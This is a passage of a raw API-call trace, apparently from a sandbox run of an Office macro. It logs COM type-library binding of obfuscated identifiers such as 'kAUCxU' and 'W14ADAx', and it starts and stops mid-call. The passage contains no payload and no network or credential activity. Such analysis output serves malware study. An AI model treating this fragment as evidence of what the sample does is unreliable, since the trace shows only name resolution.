pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.935] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.935] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.936] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.936] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.936] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.936] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.936] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.936] IUnknown:Release (This=0x665ba50) returned 0xd [0068.936] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.936] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.936] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6181e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kAUCxU") returned 7 [0068.936] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kAUCxU", lHashVal=0x10b8fa, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6181e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kAUCxU") returned 7 [0068.936] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kAUCxU", lHashVal=0x10b8fa, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6181e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kAUCxU") returned 7 [0068.936] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kAUCxU", lHashVal=0x10b8fa, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kAUCxU") returned 0x10b8fa [0068.936] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="kAUCxU" | out: _Dst="kAUCxU") returned 0x0 [0068.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="kAUCxU") returned 7 [0068.936] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.936] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kAUCxU", lHashVal=0x10b8fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.936] IUnknown:Release (This=0x665ba50) returned 0xd [0068.936] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.936] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kAUCxU", lHashVal=0x10b8fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.936] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.936] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.936] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kAUCxU", lHashVal=0x10b8fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.936] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.936] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.936] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kAUCxU", lHashVal=0x10b8fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.936] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6181e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kAUCxU") returned 7 [0068.937] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kAUCxU", lHashVal=0x10b8fa, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.937] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.937] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6181e | out: _Dst=0x67c2d40) returned 0x0 [0068.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kAUCxU") returned 0x103364 [0068.937] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_kAUCxU" | out: _Dst="_B_var_kAUCxU") returned 0x0 [0068.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_kAUCxU") returned 14 [0068.937] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.937] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kAUCxU", lHashVal=0x103364, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.937] IUnknown:Release (This=0x665ba50) returned 0xd [0068.937] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.937] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kAUCxU", lHashVal=0x103364, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.937] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.937] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.937] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kAUCxU", lHashVal=0x103364, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.937] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.937] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.937] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kAUCxU", lHashVal=0x103364, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.937] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.937] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.937] IUnknown:Release (This=0x665ba50) returned 0xd [0068.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b103de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_kAUCxU") returned 14 [0068.937] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kAUCxU", lHashVal=0x103364, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x78004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x78004300000000, pDummy=0x0) returned 0x0 [0068.937] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6181e | out: _Dst=0x144ec0) returned 0x0 [0068.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6190e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="W14ADAx") returned 8 [0068.937] ITypeComp:RemoteBind (in: This=0x665ba60, szName="W14ADAx", lHashVal=0x10e3bf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6190e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="W14ADAx") returned 8 [0068.938] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="W14ADAx", lHashVal=0x10e3bf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6190e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="W14ADAx") returned 8 [0068.938] ITypeComp:RemoteBind (in: This=0x665bd30, szName="W14ADAx", lHashVal=0x10e3bf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="W14ADAx") returned 0x10e3bf [0068.938] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="W14ADAx" | out: _Dst="W14ADAx") returned 0x0 [0068.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="W14ADAx") returned 8 [0068.938] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.938] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="W14ADAx", lHashVal=0x10e3bf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.938] IUnknown:Release (This=0x665ba50) returned 0xd [0068.938] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.938] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="W14ADAx", lHashVal=0x10e3bf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.938] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.938] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.938] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="W14ADAx", lHashVal=0x10e3bf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.938] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.938] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.938] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="W14ADAx", lHashVal=0x10e3bf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.938] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6190e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="W14ADAx") returned 8 [0068.938] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="W14ADAx", lHashVal=0x10e3bf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.938] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.938] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6190e | out: _Dst=0x67c2d40) returned 0x0 [0068.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_W14ADAx") returned 0x10e743 [0068.938] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_W14ADAx" | out: _Dst="_B_var_W14ADAx") returned 0x0 [0068.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_W14ADAx") returned 15 [0068.938] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.939] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_W14ADAx", lHashVal=0x10e743, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.939] IUnknown:Release (This=0x665ba50) returned 0xd [0068.939] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.939] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_W14ADAx", lHashVal=0x10e743, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.939] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.939] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.939] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_W14ADAx", lHashVal=0x10e743, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.939] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.939] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.939] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_W14ADAx", lHashVal=0x10e743, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.939] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.939] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.939] IUnknown:Release (This=0x665ba50) returned 0xd [0068.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1040e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_W14ADAx") returned 15 [0068.939] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_W14ADAx", lHashVal=0x10e743, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0068.939] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6190e | out: _Dst=0x144ec0) returned 0x0 [0068.939] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fCX_GZ", lHashVal=0x104f6d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a618e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fCX_GZ") returned 7 [0068.939] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fCX_GZ", lHashVal=0x104f6d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a618e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fCX_GZ") returned 7 [0068.940] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fCX_GZ", lHashVal=0x104f6d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fCX_GZ") returned 0x104f6d [0068.940] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="fCX_GZ" | out: _Dst="fCX_GZ") returned 0x0 [0068.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="fCX_GZ") returned 7 [0068.940] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.940] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fCX_GZ", lHashVal=0x104f6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.940] IUnknown:Release (This=0x665ba50) returned 0xd [0068.940] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.940] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fCX_GZ", lHashVal=0x104f6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.940] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.940] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.940] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fCX_GZ", lHashVal=0x104f6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.940] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.940] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.940] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fCX_GZ", lHashVal=0x104f6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.940] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a618e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fCX_GZ") returned 7 [0068.940] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fCX_GZ", lHashVal=0x104f6d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.940] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.940] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a618e6 | out: _Dst=0x67c2d40) returned 0x0 [0068.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fCX_GZ") returned 0x10ca16 [0068.940] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_fCX_GZ" | out: _Dst="_B_var_fCX_GZ") returned 0x0 [0068.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_fCX_GZ") returned 14 [0068.940] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.940] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fCX_GZ", lHashVal=0x10ca16, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.940] IUnknown:Release (This=0x665ba50) returned 0xd [0068.940] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.941] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fCX_GZ", lHashVal=0x10ca16, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.941] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.941] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.941] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fCX_GZ", lHashVal=0x10ca16, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.941] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.941] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.941] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fCX_GZ", lHashVal=0x10ca16, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.941] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.941] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.941] IUnknown:Release (This=0x665ba50) returned 0xd [0068.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1043e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_fCX_GZ") returned 14 [0068.941] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fCX_GZ", lHashVal=0x10ca16, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x47005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x47005f00000000, pDummy=0x0) returned 0x0 [0068.941] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a618e6 | out: _Dst=0x144ec0) returned 0x0 [0068.941] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fAAQwA", lHashVal=0x102059, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61936, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fAAQwA") returned 7 [0068.941] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fAAQwA", lHashVal=0x102059, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61936, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fAAQwA") returned 7 [0068.941] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fAAQwA", lHashVal=0x102059, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fAAQwA") returned 0x102059 [0068.941] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="fAAQwA" | out: _Dst="fAAQwA") returned 0x0 [0068.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="fAAQwA") returned 7 [0068.941] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.942] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fAAQwA", lHashVal=0x102059, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.942] IUnknown:Release (This=0x665ba50) returned 0xd [0068.942] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.942] ITypeLib:RemoteIsName (in: This=0x631b4c0, 